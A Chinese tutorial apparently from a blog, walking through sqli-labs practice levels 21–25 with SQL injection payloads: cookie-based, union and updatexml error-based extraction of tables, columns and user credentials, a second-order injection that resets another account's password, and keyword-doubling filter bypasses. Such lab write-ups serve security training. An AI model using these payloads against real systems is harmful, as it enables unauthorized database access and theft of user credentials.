Sqli-labs-master的21—25通关教程

目录

Less-21('闭合)

查询数据库名

查询数据库中的表

查询表中字段名

查询表中数据

Less-22("闭合)

查询数据库名

查询数据库中的表

查询表中字段名

查询表中数据

Less-23

查询数据库名

查询数据库中的表

查询表中字段名

查询表中数据

Less-24(二次注入)

Less-25

查询数据库名

查询数据库中的表

查询表中字段名

查询表中数据


Less-21('闭合)

登录成功后发现cookie可以显示出来,但是是乱码

登录成功后显示的页面中cookie是一串看不懂的字符, 看了后端代码后发现,是因为这里被编码过了, 那么抓包后修改cookie的值并进行 base64 编码

查询数据库名

sql 复制代码
') union select 1,2,database() #

查询数据库中的表

sql 复制代码
') and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1) #

查询表中字段名

sql 复制代码
') and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),0x7e),1) #

查询表中数据

sql 复制代码
') and updatexml(1,concat(0x7e,(select group_concat(username,0x7e,password) from users),0x7e),1) #

Less-22("闭合)

查询数据库名

sql 复制代码
" union select 1,2,database() #

查询数据库中的表

sql 复制代码
" and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1) #

查询表中字段名

sql 复制代码
" and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),0x7e),1) #

查询表中数据

sql 复制代码
" and updatexml(1,concat(0x7e,(select group_concat(username,0x7e,password) from users),0x7e),1) #

Less-23

直接在 URL 后面构造语句

查询数据库名

sql 复制代码
-1' union select 1,database(),3 and '1' = '1

查询数据库中的表

sql 复制代码
-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),3 or '1'='1

查询表中字段名

sql 复制代码
-1' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),3 or '1'='1

查询表中数据

sql 复制代码
-1' union select 1,(select group_concat(username,0x7e,password) from users),3 or '1'='1

Less-24(二次注入)

注册一个用户名 a 密码 123123 的用户

登录发现登录成功

查询数据库中的表的内容发现写入进去了

注册一个 a'# 的账户

登录上去用错误的密码修改

发现修改成功,用修改后的密码登录,发现登录成功

说明二次注入成功

Less-25

查询数据库名

sql 复制代码
-2' union select 1,2,database() --+

查询数据库中的表

sql 复制代码
-2' union select 1,2,group_concat(table_name) from infoorrmation_schema.tables where table_schema='security' --+

查询表中字段名

sql 复制代码
-2' union select 1,2,group_concat(column_name) from infoorrmation_schema.columns where table_schema='security' aandnd table_name='users' --+

查询表中数据

sql 复制代码
-1'union select 1,group_concat(username,0x3a,passwoorrd),3 from users --+
相关推荐
arvin_xiaoting几秒前
OpenClaw学习总结_I_核心架构系列_AgentLoop详解
java·学习·架构·llm·ai-agent·飞书机器人·openclaw
不漫游8 分钟前
Web聊天室测试报告
java
6+h12 分钟前
【Redis】数据结构讲解
数据结构·数据库·redis
MegaDataFlowers14 分钟前
依赖注入(DI)
java·开发语言
ID_1800790547314 分钟前
小红书笔记详情 API 接口系列 + 标准 JSON 返回参考(完整版)
数据库·笔记·json
hwscom15 分钟前
ChurchCRM SQL注入漏洞(CNVD-2026-12565、CVE-2026-24854)
sql·web安全
wertyuytrewm17 分钟前
用Python实现自动化的Web测试(Selenium)
jvm·数据库·python
晓纪同学20 分钟前
EffctiveC++_01第一章
java·开发语言·c++
zhen_hong21 分钟前
ReactAgent原理
android·java·javascript
汤姆yu21 分钟前
IDEA使用通义灵码做现有项目迭代开发保姆级教程
java·ide·intellij-idea·灵码